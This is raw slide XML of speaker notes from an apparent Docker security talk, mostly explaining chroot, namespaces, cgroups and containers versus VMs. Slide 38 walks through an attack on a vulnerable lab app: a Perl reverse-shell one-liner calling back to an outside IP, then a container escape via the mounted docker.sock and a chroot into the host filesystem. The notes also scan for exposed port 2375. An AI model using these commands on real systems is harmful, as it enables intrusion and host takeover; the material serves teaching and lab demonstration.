            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -a | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> &lt;container-id&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Got to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> http://10.1.1.116:9090/app/ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -e 'use Socket;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="192.168.0.37";$p=1234;socket(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S,PF_INET,SOCK_STREAM,getprotobyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"));if(connect(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S,sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>p,inet_aton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");};'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>zxvf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> docker-17.03.0-ce.tgz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>./docker -H  unix:///var/run/docker.sock ps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>./docker run -i -v /:/host2 debian:jessie /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>chroot /host2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>cat /etc/hostname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{201D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2735960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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1525298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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305265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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1194475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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4101209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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960383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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="868491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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297971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 of containers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is very old. Dating back to 1979. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> jail is a way to isolate a process and its children from the rest of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The idea is that you create a directory tree where you copy or link in all the system files needed for a process to run. You then use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() system call to change the root directory to be at the base of this new tree and start the process running in that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> environment.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF96A516-0989-4CB2-9728-6FBD964914C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41405317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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163040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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2068823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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –p2375</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> daemon-reload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{201D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1091114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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="592586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Namespaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker uses a technology called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> to provide the isolated workspace called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>. When you run a container, Docker creates a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> for that container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for your own process itself and that gets mapped to certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the host system. Inside containers the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are 1,2,3,4 they are actually mapped to the process on the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are other namespaces which make it look like running a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and that’s what isolates one container from another.</a:t>
            </a:r>
          </a:p>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="567425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Process containers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in 2006 was designed for limiting, accounting and isolating resource usage. It was renamed Control groups(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cgroups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F96A516-0989-4CB2-9728-6FBD964914C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2708749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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as a self contained computer packed in a single file but something needs to be able to run that file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Thats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where the hypervisor comes into play. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guest OS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: you want to run 3 applications on an isolation. You will need to spin up 3 Guest OS. The problem here is that each guest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> would need min 700MB ram. So 3 applications running in an isolation would require a min of 2.1GB of resources + CPU power + HD space + each resource would need its own set of binaries and libraries for it to run.  … A lot of resources wasted. So what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> helps, you is in just having the essential libraries and binaries required to run the application. So you would have around 100-200 MB of a base image, 10 MB of your code and 50MB of RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now lets compare that to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> containers – here we have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> daemon instead of a hypervisor. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> daemon is a service that runs on the background on your host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and manages everything required to run and interact with </a:t>
            </a:r>
            <a:r>
